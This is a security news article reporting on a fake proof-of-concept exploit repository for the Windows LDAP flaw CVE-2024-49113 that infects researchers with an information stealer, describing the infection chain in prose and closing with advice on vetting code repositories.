Security researchers are tricked into downloading and executing information-stealing malware by a fake proof-of-concept (PoC) exploit for CVE-2024-49113, dubbed LDAPNightmare.

During Microsoft’s monthly Patch Tuesday release in December 2024, two significant vulnerabilities identified as CVE-2024-49112 and CVE-2024-49113 in Windows Lightweight Directory Access Protocol (LDAP) were patched. 

CVE-2024-49112, with a 9.8 CVSS score, is a remote code execution (RCE) vulnerability that attackers can exploit by submitting specially crafted LDAP queries, allowing them to run arbitrary code on the target machine. 

A denial-of-service (DoS) vulnerability tracked as CVE-2024-49113 with a 7.5 CVSS score can be exploited to crash the LDAP service and cause interruptions in service.  

Both flaws were considered highly significant since LDAP is widely utilized in Windows environments.

Safebreach recently unveiled a proof-of-concept (PoC) exploit for a critical vulnerability in Windows Lightweight Directory Access Protocol (LDAP), tracked as CVE-2024-49112.

Investigate Real-World Malicious Links, Malware & Phishing Attacks With ANY.RUN – Try for Free

“Although the tactic of using PoC lures as vehicle for malware delivery is not new, this attack still poses significant concerns, especially since it capitalizes on a trending issue that could potentially affect a larger number of victims”, TrendMicro said in a report shared with Cyber Security News.

Fake PoC Exploit For LDAPNightmare (CVE-2024-49113)

The PoC appears to be a fork of the original creator’s malicious repository. The original Python files were replaced with the executable poc.exe, which was packed with UPX. 

The executable’s unusual existence in a Python-based project raises suspicions, even though the repository initially appears to be normal.

Repository containing “poc.exe”

A PowerShell script is dropped and run in the %Temp% folder when a user runs the file. A Scheduled Job will be created as a result, and it will then run an encoded script.

After being decoded, the script obtains another script from Pastebin that gathers the victim’s computer’s public IP address and uploads it via FTP.

According to researchers, the following data is gathered, compressed using ZIP, and then uploaded using hardcoded credentials to an external FTP server.

Computer information

Process list

Directory lists (Downloads, Recent, Documents, and Desktop)

Network IPs

Network adapters

Installed updates

 Exfiltrating the gathered information (Source: TrendMicro)

Hence, download dependencies, libraries, and code only from reputable and official sources. official sources. Watch out for repositories that appear to be hosting a tool or application that isn’t compatible with their suspicious content. 

Verify the identification of the organization or repository owner and look for anomalies or indications of malicious activity in the commit history and most recent modifications of the repository. 

Additionally, repositories that claim to be extensively used yet have very few stars, forks, or contributors should be avoided. Look for reviews, problems, or conversations regarding the repository to spot any warning signs.

Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates!